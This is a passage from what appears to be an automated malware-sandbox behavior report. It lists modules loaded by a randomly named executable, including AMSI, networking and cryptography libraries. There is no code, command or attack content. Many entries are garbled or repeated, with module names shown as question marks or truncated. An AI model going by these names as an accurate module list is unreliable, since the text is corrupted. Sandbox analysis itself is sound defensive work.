                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???y.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???2.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??????s.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: winhttpcom.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeSection loaded: ??.dllJump to behavior
